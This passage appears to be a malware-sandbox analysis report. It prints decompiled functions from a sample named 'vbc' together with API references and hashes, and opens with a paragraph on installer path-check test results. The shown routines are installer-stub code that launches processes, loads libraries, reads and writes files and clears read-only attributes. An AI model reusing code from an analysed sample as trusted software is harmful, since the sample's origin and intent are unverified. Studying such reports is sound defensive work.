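demo_ops() rebuilds the constructed volume each time it is called. Against it, is_valid_instpath("C:\\Program Files\\NewApp\\", 1, &fs) returns 1 because a missing tail is allowed, is_valid_instpath("C:\\Users\\notes.txt\\x", 1, &fs) returns 0 because a file sits in the path, create_dir_tree("C:\\Program Files\\NewApp\\bin", &fs) returns 0 and leaves both new directories in the volume, and create_dir_tree("C:\\Users\\notes.txt\\x", &fs) returns 2: one error for the file already occupying a directory's place and one for the component beneath it that cannot be created.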

                                          C-Code - Quality: 69%
                                          			E00401389(signed int _a4) {
                                          				intOrPtr* _t6;
                                          				void* _t8;
                                          				void* _t10;
                                          				signed int _t11;
                                          				void* _t12;
                                          				signed int _t16;
                                          				signed int _t17;
                                          				void* _t18;
                                          
                                          				_t17 = _a4;
                                          				while(_t17 >= 0) {
                                          					_t6 = _t17 * 0x1c +  *0x7a8ad0; // 0x1c-byte (28-byte) entries in the table at *0x7a8ad0, indexed by _t17
                                          					if( *_t6 == 1) { // entry type 1 ends the run
                                          						break;
                                          					}
                                          					_push(_t6); // executed
                                          					_t8 = E00401434(); // executed
                                          					if(_t8 == 0x7fffffff) {
                                          						return 0x7fffffff;
                                          					}
                                          					_t10 = E0040136D(_t8);
                                          					if(_t10 != 0) {
                                          						_t11 = _t10 - 1;
                                          						_t16 = _t17;
                                          						_t17 = _t11;
                                          						_t12 = _t11 - _t16;
                                          					} else {
                                          						_t12 = _t10 + 1;
                                          						_t17 = _t17 + 1;
                                          					}
                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                          						 *0x7a7a8c =  *0x7a7a8c + _t12;
                                          						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0); // 0x402 == PBM_SETPOS: progress scaled into a 0..30000 (0x7530) range
                                          					}
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • MulDiv.KERNEL32 ref: 004013E4
                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                                          • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
                                          • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                                          • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405C51(WCHAR* _a4) {
                                          				struct _PROCESS_INFORMATION _v20;
                                          				int _t7;
                                          
                                          				0x7a4f90->cb = 0x44; // 0x44 == sizeof(STARTUPINFOW) on 32-bit Windows
                                          				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed; 0x4000000 == CREATE_DEFAULT_ERROR_MODE, command line taken from _a4
                                          				if(_t7 != 0) {
                                          					CloseHandle(_v20.hThread); // the thread handle is dropped, only the process handle goes back to the caller
                                          					return _v20.hProcess;
                                          				}
                                          				return _t7;
                                          			}

                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
                                          • CloseHandle.KERNEL32(?), ref: 00405C87
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                                          • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
                                          • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                                          • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406A3B(signed int _a4) {
                                          				struct HINSTANCE__* _t5;
                                          				char* _t8; // declaration added: module name read from the table below
                                          				signed int _t10;
                                          
                                          				// _a4 selects an 8-byte entry in a table at 0x40a410: {module name, export name}
                                          				_t10 = _a4 << 3;
                                          				_t8 =  *(_t10 + 0x40a410);
                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                          				if(_t5 != 0) {
                                          					L2:
                                          					// module already loaded: resolve the export by name
                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                          				}
                                          				// not loaded yet: E004069CB builds a system-directory path and calls LoadLibraryExW (see subcalls below)
                                          				_t5 = E004069CB(_t8); // executed
                                          				if(_t5 == 0) {
                                          					return 0;
                                          				}
                                          				goto L2;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                                            • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                                            • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                                            • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                          • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
                                          • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                          • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E0040615E(WCHAR* _a4, long _a8, long _a12) {
                                          				signed int _t5;
                                          				void* _t6;
                                          
                                          				_t5 = GetFileAttributesW(_a4); // executed
                                          				// sbb-based branchless select: dwFlagsAndAttributes becomes 0 when
                                          				// GetFileAttributesW failed (0xffffffff), otherwise the existing attributes.
                                          				// The decompiler's rendering "~(_t5 + 1) & _t5" of that mask is lossy (quality 68%).
                                          				asm("sbb ecx, ecx");
                                          				// _a8 = dwDesiredAccess, share mode 1 = FILE_SHARE_READ, _a12 = dwCreationDisposition
                                          				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                          				return _t6;
                                          			}

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406139(WCHAR* _a4) {
                                          				signed char _t3;
                                          				signed char _t7;
                                          
                                          				_t3 = GetFileAttributesW(_a4); // executed
                                          				_t7 = _t3;
                                          				if(_t7 != 0xffffffff) {
                                          					// clear bit 0 (FILE_ATTRIBUTE_READONLY) so the file can be overwritten or deleted
                                          					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                          				}
                                          				// returns the original attributes, or 0xffffffff if the file could not be queried
                                          				return _t7;
                                          			}

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                          • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
                                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                          • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405C1C(WCHAR* _a4) {
                                          				int _t2;
                                          
                                          				// create _a4 with default security attributes; 0 on success, Win32 error code on failure
                                          				_t2 = CreateDirectoryW(_a4, 0); // executed
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                                          • GetLastError.KERNEL32 ref: 00405C30
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                          • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
                                          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                          • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406210(void* _a4, void* _a8, long _a12) {
                                          				int _t7;
                                          				long _t11;
                                          
                                          				// _a12 is reused as lpNumberOfBytesWritten; _t11 keeps the requested length
                                          				_t11 = _a12;
                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                          				// success only when the call succeeded and exactly the requested number of bytes was written
                                          				if(_t7 == 0 || _t11 != _a12) {
                                          					return 0;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 00406224
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                          • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                          • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004061E1(void* _a4, void* _a8, long _a12) {
                                          				int _t7;
                                          				long _t11;
                                          
                                          				// _a12 is reused as lpNumberOfBytesRead; _t11 keeps the requested length
                                          				_t11 = _a12;
                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                          				// a short read (e.g. end of file) is treated as failure
                                          				if(_t7 == 0 || _t11 != _a12) {
                                          					return 0;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061F5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                          • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
                                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                          • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004035FE(long _a4) {
                                          				long _t2;
                                          
                                          				// seek the global file handle stored at 0x40a018 to absolute offset _a4 (move method 0 = FILE_BEGIN)
                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                          				return _t2;
                                          			}

                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00401FA4() {
                                          				void* _t7;  // declaration added: value not resolved by the decompiler
                                          				void* _t9;
                                          				intOrPtr _t13;
                                          				void* _t15; // used as the zero/NULL sentinel in the comparisons below
                                          				void* _t17;
                                          				void* _t19; // declaration added
                                          				void* _t20;
                                          				void* _t22; // frame pointer: _t22 - N are locals of the enclosing frame
                                          
                                          				_t19 = E00402DA6(_t15);
                                          				E004056D0(0xffffffeb, _t7);
                                          				_t9 = E00405C51(_t19); // executed
                                          				_t20 = _t9;
                                          				if(_t20 == _t15) {
                                          					// E00405C51 returned no handle: set the local error flag
                                          					 *((intOrPtr*)(_t22 - 4)) = 1;
                                          				} else {
                                          					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                          						_t13 = E00406AE6(_t17, _t20); // executed
                                          						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                          							if(_t13 != _t15) {
                                          								 *((intOrPtr*)(_t22 - 4)) = 1;
                                          							}
                                          						} else {
                                          							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                          						}
                                          					}
                                          					_push(_t20);
                                          					CloseHandle();
                                          				}
                                          				// accumulate the local error flag into the global counter at 0x7a8b28
                                          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
                                          				return 0;
                                          			}

                                          APIs
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                            • Part of subcall function 00405C51: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
                                            • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
                                          • CloseHandle.KERNEL32(?), ref: 00401FEB
                                            • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                                            • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                                            • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                          • String ID:
                                          • API String ID: 2972824698-0
                                          • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                                          • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
                                          • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                                          • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                          				struct HWND__* _v8;
                                          				long _v12;
                                          				struct tagRECT _v28;
                                          				void* _v36;
                                          				signed int _v40;
                                          				int _v44;
                                          				int _v48;
                                          				signed int _v52;
                                          				int _v56;
                                          				void* _v60;
                                          				void* _v68;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				struct HWND__* _t94;
                                          				long _t95;
                                          				int _t100;
                                          				void* _t108;
                                          				intOrPtr _t130;
                                          				struct HWND__* _t134;
                                          				int _t156;
                                          				int _t159;
                                          				struct HMENU__* _t164;
                                          				struct HWND__* _t168;
                                          				struct HWND__* _t169;
                                          				int _t171;
                                          				void* _t172;
                                          				short* _t173;
                                          				short* _t175;
                                          				int _t177;
                                          
                                          				_t169 =  *0x7a7a84;
                                          				_t156 = 0;
                                          				_v8 = _t169;
                                          				if(_a8 != 0x110) {
                                          					if(_a8 == 0x405) {
                                          						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                          					}
                                          					if(_a8 != 0x111) {
                                          						L17:
                                          						_t171 = 1;
                                          						if(_a8 != 0x404) {
                                          							L25:
                                          							if(_a8 != 0x7b) {
                                          								goto L20;
                                          							}
                                          							_t94 = _v8;
                                          							if(_a12 != _t94) {
                                          								goto L20;
                                          							}
                                          							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                          							_a8 = _t95;
                                          							if(_t95 <= _t156) {
                                          								L36:
                                          								return 0;
                                          							}
                                          							_t164 = CreatePopupMenu();
                                          							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
                                          							_t100 = _a16;
                                          							_t159 = _a16 >> 0x10;
                                          							if(_a16 == 0xffffffff) {
                                          								GetWindowRect(_v8,  &_v28);
                                          								_t100 = _v28.left;
                                          								_t159 = _v28.top;
                                          							}
                                          							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                          								_v60 = _t156;
                                          								_v48 = 0x7a1f88;
                                          								_v44 = 0x1000;
                                          								_a4 = _a8;
                                          								do {
                                          									_a4 = _a4 - 1;
                                          									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                          								} while (_a4 != _t156);
                                          								OpenClipboard(_t156);
                                          								EmptyClipboard();
                                          								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                          								_a4 = _t108;
                                          								_t172 = GlobalLock(_t108);
                                          								do {
                                          									_v48 = _t172;
                                          									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                          									 *_t173 = 0xd;
                                          									_t175 = _t173 + 2;
                                          									 *_t175 = 0xa;
                                          									_t172 = _t175 + 2;
                                          									_t156 = _t156 + 1;
                                          								} while (_t156 < _a8);
                                          								GlobalUnlock(_a4);
                                          								SetClipboardData(0xd, _a4);
                                          								CloseClipboard();
                                          							}
                                          							goto L36;
                                          						}
                                          						if( *0x7a7a6c == _t156) {
                                          							ShowWindow( *0x7a8aa8, 8);
                                          							if( *0x7a8b2c == _t156) {
                                          								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
                                          							}
                                          							E004045A3(_t171);
                                          							goto L25;
                                          						}
                                          						 *0x7a0758 = 2;
                                          						E004045A3(0x78);
                                          						goto L20;
                                          					} else {
                                          						if(_a12 != 0x403) {
                                          							L20:
                                          							return E00404631(_a8, _a12, _a16);
                                          						}
                                          						ShowWindow( *0x7a7a70, _t156);
                                          						ShowWindow(_t169, 8);
                                          						E004045FF(_t169);
                                          						goto L17;
                                          					}
                                          				}
                                          				_v52 = _v52 | 0xffffffff;
                                          				_v40 = _v40 | 0xffffffff;
                                          				_t177 = 2;
                                          				_v60 = _t177;
                                          				_v56 = 0;
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t130 =  *0x7a8ab0;
                                          				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                          				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                          				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
                                          				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
                                          				_t134 = GetDlgItem(_a4, 0x3f8);
                                          				 *0x7a7a84 = _t134;
                                          				_v8 = _t134;
                                          				E004045FF( *0x7a7a70);
                                          				 *0x7a7a74 = E00404F58(4);
                                          				 *0x7a7a8c = 0;
                                          				GetClientRect(_v8,  &_v28);
                                          				_v52 = _v28.right - GetSystemMetrics(_t177);
                                          				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                          				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                          				if(_a8 >= 0) {
                                          					SendMessageW(_v8, 0x1001, 0, _a8);
                                          					SendMessageW(_v8, 0x1026, 0, _a8);
                                          				}
                                          				if(_a12 >= _t156) {
                                          					SendMessageW(_v8, 0x1024, _t156, _a12);
                                          				}
                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                          				_push(0x1b);
                                          				E004045CA(_a4);
                                          				if(( *0x7a8ab8 & 0x00000003) != 0) {
                                          					ShowWindow( *0x7a7a70, _t156);
                                          					if(( *0x7a8ab8 & 0x00000002) != 0) {
                                          						 *0x7a7a70 = _t156;
                                          					} else {
                                          						ShowWindow(_v8, 8);
                                          					}
                                          					E004045FF( *0x7a7a68);
                                          				}
                                          				_t168 = GetDlgItem(_a4, 0x3ec);
                                          				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                          				if(( *0x7a8ab8 & 0x00000004) != 0) {
                                          					SendMessageW(_t168, 0x409, _t156, _a12);
                                          					SendMessageW(_t168, 0x2001, _t156, _a8);
                                          				}
                                          				goto L36;
                                          			}

                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040586D
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040587C
                                          • GetClientRect.USER32 ref: 004058B9
                                          • GetSystemMetrics.USER32 ref: 004058C0
                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
                                          • ShowWindow.USER32(00000000,?), ref: 00405948
                                          • ShowWindow.USER32(?,00000008), ref: 0040595C
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040597D
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040588B
                                            • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                                          • GetDlgItem.USER32(?,000003EC), ref: 004059CF
                                          • CreateThread.KERNEL32(00000000,00000000,Function_000057A3,00000000), ref: 004059DD
                                          • CloseHandle.KERNEL32(00000000), ref: 004059E4
                                          • ShowWindow.USER32(00000000), ref: 00405A08
                                          • ShowWindow.USER32(?,00000008), ref: 00405A0D
                                          • ShowWindow.USER32(00000008), ref: 00405A57
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
                                          • CreatePopupMenu.USER32 ref: 00405A9C
                                          • AppendMenuW.USER32 ref: 00405AB0
                                          • GetWindowRect.USER32(?,?), ref: 00405AD0
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
                                          • OpenClipboard.USER32(00000000), ref: 00405B31
                                          • EmptyClipboard.USER32 ref: 00405B37
                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
                                          • GlobalLock.KERNEL32 ref: 00405B4D
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
                                          • SetClipboardData.USER32 ref: 00405B8C
                                          • CloseClipboard.USER32 ref: 00405B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
